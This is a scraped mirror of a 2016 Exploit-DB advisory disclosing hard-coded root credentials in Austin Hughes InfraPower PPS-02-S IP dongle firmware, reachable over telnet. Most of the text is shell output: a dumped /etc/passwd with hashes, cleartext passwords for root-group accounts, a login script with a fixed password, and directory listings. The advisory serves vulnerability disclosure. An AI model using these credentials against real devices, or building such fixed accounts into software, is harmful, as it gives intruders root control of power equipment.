InfraPower PPS-02-S Q213V1 – Hard-Coded Credentials

• Exploit Database
• 119 阅读

• 作者： LiquidWorm
  日期： 2016-10-28
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40643/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193

  InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access     Vendor: Austin Hughes Electronics Ltd. Product web page: http://www.austin-hughes.com Affected version: Q213V1 (Firmware: V2395S) Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)   Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is a highly efficient cient application for saving not only the IP remote accessories cost, but also the true IP addresses required on the PDU management.   Desc: InfraPower suffers from a use of hard-coded credentials. The IP dongle firmware ships with hard-coded accounts that can be used to gain full system access (root) using the telnet daemon on port 23.   Tested on: Linux 2.6.28 (armv5tel) lighttpd/1.4.30-devel-1321 PHP/5.3.9 SQLite/3.7.10     Vulnerabiliy discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2016-5371 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php     27.09.2016   --     # cat /etc/passwd   root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh   # showing accounts in root group:   Username: root Password: 8475 -- Username: service Password: ipdongle -- Username: www Password: 9311 -- Username: www2 Password: 9311   # showing other less-privileged accounts:   Username: user Password: 8475 -- Username: admin Password: 8475   --------   /mnt/mtd # echo $SHELL /sbin/root_shell.sh /mnt/mtd # cat /sbin/root_shell.sh #!/bin/sh trap ""2 3 9 24   # check login passWork=<code>cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2 if [ "$passWork" = "1" ]; then login_file=/mnt/mtd/root_login now_timestamp=<code>date +%s if [ -f $login_file ]; then line=<code>wc -l $login_file | cut -c 1-9 if [ "$line" != "0" ] && [ "$line" != "1" ] && [ "$line" != "2" ]; then pre_login=<code>tail -n 3 $login_file | cut -d " " -f 1 pre_result1=<code>echo $pre_login | cut -d " " -f 1 pre_result2=<code>echo $pre_login | cut -d " " -f 2 pre_result3=<code>echo $pre_login | cut -d " " -f 3 if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then pre_timestamp=<code>tail -n 1 $login_file | cut -d " " -f 2 result=<code>/sbin/checkLoginTime $pre_timestamp $now_timestamp if [ "$result" != "success" ]; then echo $result exit 0 fi fi fi fi   echo -n "password:" read pass if [ "$pass" != "999" ]; then echo "wrong password" echo fail $now_timestamp >> $login_file exit 0 fi echo success $now_timestamp >> $login_file fi   /bin/sh /mnt/mtd #   --------   /mnt/mtd # ls IMG001.exe boot.old.shload_config.logmain_confnet_conf passwd_confsnmp_confweb_conf PDU3_ini box_conf log_memCheck.txt main_conf.baknet_conf.old port_confsnmpd.conf PDU3_pol info.zip mac_addr me_login ntp_conf privatestart_service.log   --------   /mnt/mtd # df -h   FilesystemSizeUsed Available Use% Mounted on tmpfs 256.0M4.0K256.0M 0% /tmp /dev/mtdblock11.4M 96.0K1.3M 7% /mnt/mtd /dev/mtdblock51.0M 60.0K964.0K 6% /mnt/mtd1 /dev/mtdblock61.0M 60.0K964.0K 6% /mnt/mtd2 /dev/mtdblock71.0M 60.0K964.0K 6% /mnt/mtd3   --------   /www # ls -al   drwxr-xr-x5 1013 10140 Jan 13 08:41 . drwxr-xr-x 16 root root0 Nov 28 11:17 .. -rwxr--r--1 1013 1014 6875 Apr 222014 CSSSource.php -rwxr--r--1 1013 1014291 Apr 222014 Config.php -rwxr--r--1 1013 1014 1685 Apr 222014 ConnPort.php -rwxr--r--1 1013 1014 5787 Apr 222014 FWUpgrade.php -rwxr--r--1 1013 1014 7105 Apr 222014 Firmware.php -rwxr--r--1 1013 101410429 Apr 222014 Function.php drwxr-xr-x2 1013 10140 Apr 222014 General -rwxr--r--1 1013 1014 1407 Apr 222014 Header.php -rwxr--r--1 1013 1014 6775 Apr 222014 IPSettings.php drwxr-xr-x2 1013 10140 Apr 222014 Images drwxr-xr-x2 1013 10140 Apr 222014 JavaScript -rwxr--r--1 1013 1014408 Apr 222014 JavaSource.php -rwxr--r--1 1013 1014849 Apr 222014 ListFile.php -rwxr--r--1 1013 101412900 Apr 222014 Login.php -rwxr--r--1 1013 1014355 Apr 222014 Logout.php -rwxr--r--1 1013 1014352 Apr 222014 Main_Config.php -rwxr--r--1 1013 1014 5419 Apr 222014 Menu.php -rwxr--r--1 1013 1014942 Apr 222014 Menu_3.php -rwxr--r--1 1013 1014 4491 Apr 222014 Ntp.php -rwxr--r--1 1013 101423853 Apr 222014 OutletDetails.php -rwxr--r--1 1013 1014 1905 Apr 222014 OutletDetails_Ajax.php -rwxr--r--1 1013 101448411 Apr 222014 PDUDetails.php -rwxr--r--1 1013 1014 4081 Apr 222014 PDUDetails_Ajax_Details.php -rwxr--r--1 1013 1014 1397 Apr 222014 PDUDetails_Ajax_Outlet.php -rwxr--r--1 1013 101419165 Apr 222014 PDULog.php -rwxr--r--1 1013 101429883 Apr 222014 PDUStatus.php -rwxr--r--1 1013 1014 4418 Apr 222014 PDUStatus_Ajax.php -rwxr--r--1 1013 1014 7791 Apr 222014 PortSettings.php -rwxr--r--1 1013 101424696 Apr 222014 SNMP.php -rwxr--r--1 1013 101438253 Apr 222014 SensorDetails.php -rwxr--r--1 1013 101427210 Apr 222014 SensorStatus.php -rwxr--r--1 1013 1014 5984 Apr 222014 SensorStatus_Ajax.php -rwxr--r--1 1013 101440944 Apr 222014 System.php -rwxr--r--1 1013 1014 4373 Apr 222014 UploadEXE.php -rwxr--r--1 1013 1014 9460 Apr 222014 User.php -rwxr--r--1 1013 101423170 Apr 222014 WriteRequest.php -rwxr--r--1 1013 1014 8850 Apr 222014 WriteRequest_Ajax.php -rwxr--r--1 1013 101410811 Apr 222014 dball.php -rwxr--r--1 1013 1014771 Apr 222014 doupgrate.php -rwxr--r--1 1013 1014 76 Apr 222014 index.php -rwxr--r--1 1013 1014 49 Apr 222014 nfs.sh -rwxr--r--1 1013 1014 5410 Apr 222014 production_test1.php -rwxr--r--1 1013 1014723 Apr 222014 vaildate.php -rwxr--r--1 1013 1014611 Apr 222014 wiseup.php